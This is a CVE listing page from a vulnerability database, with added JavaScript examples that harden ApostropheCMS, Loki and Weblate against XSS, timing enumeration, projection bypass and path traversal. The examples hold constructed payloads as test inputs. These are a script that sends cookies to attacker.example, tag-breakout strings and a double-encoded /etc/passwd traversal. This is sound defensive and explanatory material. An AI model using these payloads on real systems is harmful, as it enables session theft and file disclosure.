Vulnerabilities

To inform, warn and help professionals about the latest security vulnerabilities in technology systems, we have made a database available to anyone interested in this information. It is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 records, is based on information from the NVD (National Vulnerability Database); under a partnership agreement, INCIBE translates the included information into Spanish.

Occasionally this list will show vulnerabilities that have not yet been translated, because entries are added while the INCIBE team is still carrying out the translation. The CVE (Common Vulnerabilities and Exposures) standard for information security vulnerability names is used to support the exchange of information between different tools and databases.

Every vulnerability collected is linked to its information sources and to any patches or fixes provided by manufacturers and developers. Advanced searches are possible: results can be narrowed by criteria such as vulnerability type, manufacturer and impact level.

Through RSS feeds or newsletters you can be informed daily about the latest vulnerabilities added to the repository. Below is a list, updated daily, of the latest vulnerabilities.

CVE-2026-35569

Publication date:
15/04/2026
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in SEO-related fields (SEO Title and Meta Description), where user-controlled input is rendered without proper output encoding into HTML contexts including tags, attributes, and JSON-LD structured data. An attacker can inject a payload such as ">alert(1) to break out of the intended HTML context and execute arbitrary JavaScript in the browser of any authenticated user who views the affected page. This can be leveraged to perform authenticated API requests, access sensitive data such as usernames, email addresses, and roles via internal APIs, and exfiltrate it to an attacker-controlled server. This issue has been fixed in version 4.29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-40915

Publication date:
15/04/2026
A flaw was found in GIMP. A remote attacker could exploit an integer overflow vulnerability in the FITS image loader by providing a specially crafted FITS file. This integer overflow leads to a zero-byte memory allocation, which is then subjected to a heap buffer overflow when processing pixel data. Successful exploitation could result in a denial of service (DoS) or potentially arbitrary code execution.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-40916

Publication date:
15/04/2026
A flaw was found in GIMP. A stack buffer overflow vulnerability in the TIM image loader's 4BPP decoding path allows a local user to cause a Denial of Service (DoS). By opening a specially crafted TIM image file, the application crashes due to an unconditional overflow when writing to a variable-length array.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-33889

Publication date:
15/04/2026
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in the @apostrophecms/color-field module, where color values prefixed with -- bypass TinyColor validation intended for CSS custom properties, and the launder.string() call performs only type coercion without stripping HTML metacharacters. These unsanitized values are then concatenated directly into tags both in per-widget style elements rendered for all visitors and in the global stylesheet rendered for editors, with the output marked as safe HTML. An editor can inject a value which closes the style tag and executes arbitrary JavaScript in the browser of every visitor to any page containing the affected widget. This enables mass session hijacking, cookie theft, and privilege escalation to administrative control if an admin views draft content. This issue has been fixed in version 4.29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026
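The two ApostropheCMS stored-XSS entries above (SEO fields rendered into element content, attributes and JSON-LD; colour values concatenated into style elements) share one root cause: a value is written into an HTML context without an encoder for that context. The following is an added example, not ApostropheCMS code, showing one encoder per sink; the field names, the JSON-LD shape and the accepted colour grammar are assumptions for illustration.

```javascript
// Added example, not ApostropheCMS code: one encoder per output context for
// the sinks in CVE-2026-35569 and CVE-2026-33889. Field names, the JSON-LD
// shape and the accepted colour grammar are assumptions for illustration.

// HTML element content and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JSON inside <script type="application/ld+json">. JSON.stringify alone is
// not enough: the HTML parser ends the element at the first "</script"
// whatever the JSON string boundaries are. Escaping < > & (and the two line
// separators that break older JS parsers) as \uXXXX keeps the JSON valid and
// leaves no byte sequence that can close the element.
function jsonForScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Colour values written into <style>: validate against a strict grammar rather
// than escape. Accepts #rgb..#rrggbbaa, rgb()/hsl() with numeric arguments,
// var(--name) and bare --name where name is [A-Za-z0-9_-] only, so a value
// such as "--x</style><script>" fails at the first "<".
const COLOR_RE = /^(#[0-9a-f]{3,8}|(rgb|hsl)a?\(\s*[\d.%\s,\/]+\)|var\(\s*--[a-z0-9_-]+\s*\)|--[a-z0-9_-]+)$/i;
function safeCssColor(value) {
  const v = String(value).trim();
  if (!COLOR_RE.test(v)) throw new Error('rejected colour value: ' + v);
  return v;
}

// Render the <head> fragment; each interpolation uses the encoder for its own
// context. Returned as a string so the result can be inspected.
function renderHead({ seoTitle, metaDescription, widgetColor }) {
  const jsonLd = { '@context': 'https://schema.org', '@type': 'WebPage',
                   name: seoTitle, description: metaDescription };
  return [
    `<title>${escapeHtml(seoTitle)}</title>`,
    `<meta name="description" content="${escapeHtml(metaDescription)}">`,
    `<script type="application/ld+json">${jsonForScript(jsonLd)}</script>`,
    `<style>.widget{color:${safeCssColor(widgetColor)}}</style>`,
  ].join('\n');
}

// Constructed inputs shaped like the payloads the advisories describe.
const EVIL_TITLE = '"><script>alert(1)</script>';
const EVIL_DESC = '</script><script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const EVIL_COLOR = '--x</style><script>alert(1)</script>';

// Stand-alone run: the first two payloads are neutralised, the third is refused.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderHead({ seoTitle: EVIL_TITLE, metaDescription: EVIL_DESC, widgetColor: '#fff' }));
  try { safeCssColor(EVIL_COLOR); } catch (e) { console.log(e.message); }
}
```

Marking the concatenated output as "safe HTML" (as the colour-field advisory describes) only makes sense after the value has passed a validator like `safeCssColor`; for free-text fields there is no safe-list, so the encoder for the exact context is the only option, and a JSON-LD block needs the script-aware escaper, not plain `JSON.stringify`.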

CVE-2026-33877

Publication date:
15/04/2026
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a timing side-channel vulnerability in the password reset endpoint (/api/v1/@apostrophecms/login/reset-request) that allows unauthenticated username and email enumeration. When a user is not found, the handler returns after a fixed 2-second artificial delay, but when a valid user is found, it performs a MongoDB update and SMTP email send with no equivalent delay normalization, producing measurably different response times. The endpoint also accepts both username and email via an $or query, and has no rate limiting as the existing checkLoginAttempts throttle only applies to the login flow. This enables automated enumeration of valid accounts for use in credential stuffing or targeted phishing. Only instances that have explicitly enabled the passwordReset option are affected, as it defaults to false. This issue has been fixed in version 4.29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026
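The reset-request entry above describes two independent weaknesses: the not-found branch sleeps for a fixed time while the found branch does unrelated database and SMTP work, and the endpoint sits outside the login throttle. The following added example (not ApostropheCMS code) shows a handler whose response time and body do not depend on whether the account exists, plus a per-client limiter; the store, mailer, client key and identifiers are stand-ins assumed for illustration.

```javascript
// Added example, not ApostropheCMS code: a password-reset request handler
// whose externally observable behaviour does not depend on whether the
// account exists, plus a per-client throttle. The store, mailer and client
// key are assumed stand-ins for illustration.

const FIXED_RESPONSE_MS = 2000;   // every request answers this long after arrival
const GENERIC_BODY = { message: 'If the account exists, an email has been sent.' };

// Fixed-window limiter keyed by client address (assumed key; derive it from
// the real client IP behind your proxy configuration).
class RateLimiter {
  constructor(limit, windowMs) { this.limit = limit; this.windowMs = windowMs; this.hits = new Map(); }
  allow(key, now = Date.now()) {
    const e = this.hits.get(key);
    if (!e || now - e.start >= this.windowMs) { this.hits.set(key, { start: now, count: 1 }); return true; }
    e.count += 1;
    return e.count <= this.limit;
  }
}

// Vulnerable shape, as the advisory describes it: the not-found path sleeps,
// the found path does I/O whose duration is unrelated to the sleep, so the
// two branches are distinguishable from the response time.
async function resetRequestLeaky(identifier, store, mailer, sleep) {
  const user = await store.findUser(identifier);
  if (!user) { await sleep(FIXED_RESPONSE_MS); return { status: 200, body: GENERIC_BODY }; }
  await store.setResetToken(user);
  await mailer.send(user.email);
  return { status: 200, body: GENERIC_BODY };
}

// Hardened shape: throttle first, decide the generic answer up front, run the
// expensive work off the response path, and release the response at a fixed
// time after arrival on both branches. What remains is only the lookup itself.
async function resetRequestUniform(identifier, store, mailer, limiter, clientKey, opts = {}) {
  const responseMs = opts.responseMs ?? FIXED_RESPONSE_MS;
  const start = Date.now();
  if (!limiter.allow(clientKey, start)) return { status: 429, body: { message: 'Too many requests' } };
  const user = await store.findUser(identifier);
  if (user) {
    // Not awaited: the token write and the SMTP send happen in the background.
    Promise.resolve()
      .then(() => store.setResetToken(user))
      .then(() => mailer.send(user.email))
      .catch(() => { /* log server-side; never surface the outcome to the client */ });
  }
  const remaining = Math.max(0, responseMs - (Date.now() - start));
  await new Promise((resolve) => setTimeout(resolve, remaining));
  return { status: 200, body: GENERIC_BODY };
}

// Constructed in-memory store and mailer so the block runs stand-alone.
const demoStore = {
  users: new Map([['alice', { email: 'alice@example.test' }]]),
  async findUser(id) { return this.users.get(id) ?? null; },
  async setResetToken(user) { user.token = 'constructed-token'; },
};
const demoMailer = { sent: [], async send(to) { this.sent.push(to); } };
```

The fixed delay hides the database and SMTP work only because that work is no longer on the response path; awaiting it and then padding would still leak when the work takes longer than the pad. The limiter is deliberately separate from any login throttle, since the advisory's point is that the reset endpoint was not covered by the login one.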

CVE-2026-33888

Publication date:
15/04/2026
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain an authorization bypass vulnerability in the getRestQuery method of the @apostrophecms/piece-type module, where the method checks whether a MongoDB projection has already been set before applying the admin-configured publicApiProjection. An unauthenticated attacker can supply a project query parameter in the REST API request, which is processed by applyBuildersSafely before the permission check, pre-populating the projection state and causing the publicApiProjection to be skipped entirely. This allows disclosure of any field on publicly queryable documents that the administrator explicitly restricted from the public API, such as internal notes, draft content, or metadata. Exploitation is trivial, requiring only that query parameters be appended to a public URL, with no authentication. This issue has been fixed in version 4.29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026
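The projection bypass above is an ordering bug: a caller-controlled builder runs before the permission step, and the permission step treats "a projection already exists" as "the restriction has been applied". The following added example (not ApostropheCMS code) reproduces that shape and contrasts it with an ordering in which the public projection is a ceiling that a request can only narrow; the field names, the `?project=` wire format and the allow-list are assumptions for illustration.

```javascript
// Added example, not ApostropheCMS code: a "projection already set?" check
// that a request parameter can pre-empt, next to an ordering where the
// public projection is always applied as a ceiling. Field names, the
// ?project= format and the allow-list are assumptions for illustration.

// Admin-configured allow-list of fields exposed to the public API (assumed).
const PUBLIC_API_PROJECTION = { title: 1, slug: 1, publishedAt: 1 };

// Parse ?project=field1,field2 into a MongoDB-style inclusion projection.
function parseProjectParam(raw) {
  if (typeof raw !== 'string' || raw.trim() === '') return null;
  const proj = {};
  for (const f of raw.split(',')) { const k = f.trim(); if (k) proj[k] = 1; }
  return proj;
}

// Vulnerable ordering: the caller-supplied projection is applied first, and
// the permission step skips the public projection when one is already set.
function buildProjectionVulnerable(query, user) {
  const state = { projection: parseProjectParam(query.project) };
  if (!user && !state.projection) state.projection = { ...PUBLIC_API_PROJECTION };
  return state.projection;
}

// Hardened ordering: for unauthenticated callers the public projection is the
// ceiling; a requested projection is intersected with it, never substituted
// for it. An intersection that is empty yields no fields, not all fields.
function buildProjectionHardened(query, user) {
  const requested = parseProjectParam(query.project);
  if (user) return requested;                 // authenticated: normal rules apply
  const allowed = { ...PUBLIC_API_PROJECTION };
  if (!requested) return allowed;
  const narrowed = {};
  for (const k of Object.keys(requested)) if (allowed[k]) narrowed[k] = 1;
  return narrowed;
}

// Apply an inclusion projection to a document (demo semantics only).
function applyProjection(doc, projection) {
  if (!projection) return { ...doc };
  const out = {};
  for (const k of Object.keys(projection)) if (projection[k] && k in doc) out[k] = doc[k];
  return out;
}

// Constructed document with a field the administrator meant to keep private.
const SAMPLE_DOC = {
  title: 'Hello', slug: 'hello', publishedAt: '2026-01-01',
  internalNotes: 'do not publish',
};

// Stand-alone run: the same request against both orderings.
if (typeof require !== 'undefined' && require.main === module) {
  const req = { project: 'internalNotes,title' };
  console.log('vulnerable:', applyProjection(SAMPLE_DOC, buildProjectionVulnerable(req, null)));
  console.log('hardened: ', applyProjection(SAMPLE_DOC, buildProjectionHardened(req, null)));
}
```

The test to keep in a project's suite is the last pair of lines: an anonymous request naming a restricted field must come back without it, independently of any other builder that ran earlier in the pipeline.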

CVE-2026-21726

Publication date:
15/04/2026
The fix for CVE-2021-36156 validates the namespace parameter for path traversal sequences after a single URL decode; by double encoding, an attacker can read files through the Ruler API endpoint /loki/api/v1/rules/{namespace}.

Thanks to Prasanth Sundararajan for reporting this vulnerability.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-21727

Publication date:
15/04/2026
Cross-Tenant Legacy Correlation Disclosure and Deletion
Product: Grafana
Date: 2026-01-29
Severity: Low
CVE: CVE-2026-21727
CVSS score: 3.3
CVSS vector: CVSS:3.3/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N
Fixed versions: >=11.6.11, >=12.0.9, >=12.1.6, >=12.2.4

A cross-tenant isolation vulnerability was found in Grafana’s Correlations feature affecting legacy correlation records. Due to a backward compatibility condition allowing org_id = 0 records to be returned across organizations, a user with datasource management privileges could read and permanently delete legacy correlation data belonging to another organization. This issue affects correlations created prior to Grafana 10.2 and is fixed in >=11.6.11, >=12.0.9, >=12.1.6, and >=12.2.4.

Thanks to Gyu-hyeok Lee (g2h) for reporting this vulnerability.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2025-41118

Publication date:
15/04/2026
Pyroscope is an open-source continuous profiling database. The database supports various storage backends, including Tencent Cloud Object Storage (COS).

If the database is configured to use Tencent COS as the storage backend, an attacker could extract the secret_key configuration value from the Pyroscope API.

To exploit this vulnerability, an attacker needs direct access to the Pyroscope API. We highly recommend limiting the public internet exposure of all our databases, such that they are only accessible by trusted users or internal systems.

This vulnerability is fixed in versions:

1.15.x: 1.15.2 and above.
1.16.x: 1.16.1 and above.
1.17.x: 1.17.0 and above (i.e. all versions).

Thanks to Théo Cusnir for reporting this vulnerability to us via our bug bounty program.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-6245

Publication date:
15/04/2026
A flaw was found in the System Security Services Daemon (SSSD). The pam_passkey_child_read_data() function within the PAM passkey responder fails to properly handle raw bytes received from a pipe. Because the data is treated as a NUL-terminated C string without explicit termination, it results in an out-of-bounds read when processed by functions like snprintf(). A local attacker could potentially trigger this vulnerability by initiating a crafted passkey authentication request, causing the SSSD PAM responder to crash, resulting in a local Denial of Service (DoS).
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-6383

Publication date:
15/04/2026
A flaw was found in KubeVirt's Role-Based Access Control (RBAC) evaluation logic. The authorization mechanism improperly truncates subresource names, leading to incorrect permission evaluations. This allows authenticated users with specific custom roles to gain unauthorized access to subresources, potentially disclosing sensitive information or performing actions they are not permitted to do. Additionally, legitimate users may be denied access to resources.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-40256

Publication date:
15/04/2026
Weblate is a web based localization tool. In versions prior to 5.17, repository-boundary validation relies on string prefix checks on resolved absolute paths. In multiple code paths, the check uses startswith against the repository root path. This is not path-segment aware and can be bypassed when the external path shares the same string prefix as the repository path (for example, repo and repo_outside). This issue has been fixed in version 5.17.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026
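The Loki entry (CVE-2026-21726) and the Weblate entry (CVE-2026-40256) above are two failures of the same check: one decodes the untrusted value once before looking for traversal sequences, the other compares resolved paths with a string prefix that is not segment-aware, so `repo_outside` passes as being under `repo`. The following added example, not Loki or Weblate code, shows the naive checks beside one containment routine that decodes to a fixed point, rejects residual encoding, and compares path segments rather than strings. Roots, names and the POSIX-only path handling are assumptions for illustration; the routine generalises beyond the two advisories in that it treats every untrusted name as relative to the root.

```javascript
// Added example, not Loki or Weblate code: path containment that handles both
// double-encoded traversal and string-prefix confusion. Roots, names and the
// POSIX-only path handling are assumptions for illustration.

const MAX_DECODE_ROUNDS = 3;

// Decode until the value stops changing. A value still carrying "%" after the
// rounds either needs more decoding than any honest client would use, or is
// not a plain name; both are rejected rather than guessed at.
function fullyDecode(value) {
  let cur = String(value);
  for (let i = 0; i < MAX_DECODE_ROUNDS; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { throw new Error('malformed percent-encoding'); }
    if (next === cur) break;
    cur = next;
  }
  if (cur.includes('%')) throw new Error('residual encoding after decode');
  return cur;
}

// Resolve "." and ".." in an absolute POSIX path and return its segments.
// Comparing segment lists makes prefix tricks like "repo_outside" impossible.
function toSegments(absPath) {
  if (!absPath.startsWith('/')) throw new Error('expected absolute path');
  const out = [];
  for (const seg of absPath.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') { out.pop(); continue; }
    out.push(seg);
  }
  return out;
}

// True when every segment of root appears, in order, at the start of target.
function isInside(rootSegs, targetSegs) {
  if (targetSegs.length < rootSegs.length) return false;
  return rootSegs.every((s, i) => s === targetSegs[i]);
}

// Weblate-style check: string prefix on resolved absolute paths (vulnerable).
function checkPrefixNaive(root, absPath) { return absPath.startsWith(root); }

// Segment-aware replacement for the same call site.
function checkSegments(root, absPath) { return isInside(toSegments(root), toSegments(absPath)); }

// Loki-style check: single decode, then look for ".." (vulnerable). The
// returned path still carries "%2e%2e", which a later decode turns into "..".
function resolveNaive(root, untrusted) {
  const once = decodeURIComponent(untrusted);
  if (once.includes('..')) throw new Error('traversal');
  return root + '/' + once;
}

// Hardened: decode to a fixed point, then check containment on segments. The
// untrusted name is always interpreted relative to root, even if it looks absolute.
function resolveSafe(root, untrusted) {
  const name = fullyDecode(untrusted);
  if (name.includes('\0')) throw new Error('NUL byte in name');
  const rootSegs = toSegments(root);
  const targetSegs = toSegments(root + '/' + name);
  if (!isInside(rootSegs, targetSegs)) throw new Error('outside root');
  return '/' + targetSegs.join('/');
}

// Stand-alone run with constructed inputs shaped like the two advisories.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('prefix  :', checkPrefixNaive('/srv/repo', '/srv/repo_outside/secret'));   // true (wrong)
  console.log('segments:', checkSegments('/srv/repo', '/srv/repo_outside/secret'));     // false
  console.log('naive   :', resolveNaive('/srv/rules', '%252e%252e%2fetc%2fpasswd'));    // passes, still encoded
  try { resolveSafe('/srv/rules', '%252e%252e%2fetc%2fpasswd'); } catch (e) { console.log('safe    :', e.message); }
}
```

The bound on decode rounds matters: a loop that decodes "until stable" with no limit, or one that silently accepts a leftover "%", reintroduces the original problem one layer down. Where the platform offers a segment-aware relative-path function, use it in place of `toSegments`; the point is the comparison on segments, not the helper.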